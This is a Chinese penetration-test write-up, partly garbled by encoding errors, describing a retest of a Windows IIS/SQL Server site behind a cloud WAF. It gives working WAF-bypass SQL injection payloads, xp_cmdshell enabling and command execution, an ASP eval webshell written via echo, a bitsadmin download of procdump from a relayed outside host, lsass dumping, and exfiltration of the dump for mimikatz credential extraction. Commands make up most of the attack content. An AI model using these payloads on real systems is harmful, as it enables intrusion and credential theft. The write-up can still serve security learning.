前言

在初測(cè)某系統(tǒng)時(shí)篷角，發(fā)現(xiàn)該系統(tǒng)存在文件上傳锹引，SQL注入等高危漏洞。
經(jīng)過一段時(shí)間的整改助隧。復(fù)測(cè)時(shí)發(fā)現(xiàn)系統(tǒng)的文件上傳漏洞已經(jīng)修復(fù)筑凫。但仍然存在SQL注入漏洞。只不過加了一層云鎖的防護(hù)并村。

信息收集

IP為阿里云巍实、windows+IIS+aspx+sql server、云鎖的防護(hù)哩牍、80棚潦、1433、3389端口開放

sql注入

sql注入點(diǎn)還是初測(cè)的搜索框的注入膝昆。在云鎖的防護(hù)下瓦盛，無法使用sqlmap跑包洗显。
會(huì)封IP。

image.png

筆者選擇手動(dòng)注入bypass
簡(jiǎn)單的payload

1%';execute('sel'%2b'ect convert(int,@@version)') -- 
1%';execute('sel'%2b'ect convert(int,user)') -- 
1%';if(select IS_SRVROLEMEMBER('sysadmin'))=1 waitfor delay '0:0:5' -- 

image.png

image.png

筆者考慮到sqlserver數(shù)據(jù)庫(kù)的龐大數(shù)據(jù)問題原环，以及上傳漏洞被修復(fù)挠唆。可能進(jìn)了管理后臺(tái)也不存在上傳漏洞嘱吗。 且當(dāng)前sqlserver為dbo用戶玄组，可以命令執(zhí)行。
（還有一思路：利用dnslog讀取sqlserver的密碼谒麦，然后遠(yuǎn)程連接sqlserver數(shù)據(jù)庫(kù)俄讹。嘗試了多半個(gè)小時(shí)還是沒法bypass）

命令執(zhí)行

sqlserver執(zhí)行系統(tǒng)需要開啟xp_cmdshell組件。

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

執(zhí)行時(shí)云鎖并未攔截绕德。
頁(yè)面沒有回顯患膛。不知道是否成功開啟。
執(zhí)行幾條系統(tǒng)命令試試耻蛇。

image.png

image.png

image.png

system的權(quán)限臣咖，再加上IP為阿里云跃捣，直接添加用戶遠(yuǎn)程好啦。
哪知道夺蛇，這才是剛剛開始疚漆。

1%';exec master.dbo.xp_cmdshell "whoami >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "dir >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "tasklist >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "net user admin 1234qwer.. /add >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "net user  >> c:\\xxx\\Admin\\1.txt"

幾條命令執(zhí)行后，竟然沒法添加上用戶刁赦∪⑵福可能進(jìn)程里存在防護(hù)。

image.png

陷入僵局······

思路一

通過echo寫入asp一句話?cǎi)R甚脉，bypass 云鎖可以使用include包含丸升。
結(jié)果服務(wù)器500

echo ^<%eval request('x')%^> > c:\\wwwroot\\xxxx\Admin\\2.txt
echo ^<!--#include file='2.txt'--^> >  c:\\wwwroot\\xxxx\Admin\\2.asp

image.png

思路二

使用冰蝎自帶的asp webshell。將源碼base64編碼后宦焦，certutil -encode 解碼生成asp馬发钝。
結(jié)果字符長(zhǎng)度有限制。

image.png

思路三

打算使用frp+metasploit波闹，然后發(fā)現(xiàn)vps被封啦酝豪。
最后采用prodump+mimikatz讀取windows密碼

Procdump導(dǎo)出lsass.dmp

通過bitsadmin命令遠(yuǎn)程下載prodump文件到目標(biāo)機(jī)上。
（因?yàn)関ps不能用精堕，筆者先將prodump64.exe上傳到曾經(jīng)被拿下且還存活的靶機(jī)上孵淘，再通過bitsadmin命令從靶機(jī)上下載prodump64.exe到目標(biāo)機(jī)上。簡(jiǎn)單來說歹篓，相當(dāng)于中轉(zhuǎn)了一下）

bitsadmin /transfer myDownLoadJob /download /priority normal "http://111.xxxx:82/ArcGIS/procdump.exe" "C:\\Windows\\system32\\procdump.exe"

為了避免再次出現(xiàn)字符長(zhǎng)度的限制瘫证，筆者選擇下載到c:\windows\system\目錄下
即sql server命令執(zhí)行的目錄揉阎。

image.png

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Procdump導(dǎo)出lsass.dmp

image.png

再通過copy 到 c:\wwwroot\xxxx\admin\lsass.dmp

image.png

當(dāng)訪問的時(shí)候，竟然出現(xiàn)404背捌。筆者一直以為copy命令有誤毙籽。
dir查看該目錄才發(fā)現(xiàn)這神奇的問題。

image.png

手動(dòng)將lsass.dmp重命名為x.txt毡庆，成功下載坑赡。然后在本地上再重命名回dmp。就可以通過mimikatz讀取hash

image.png

image.png

image.png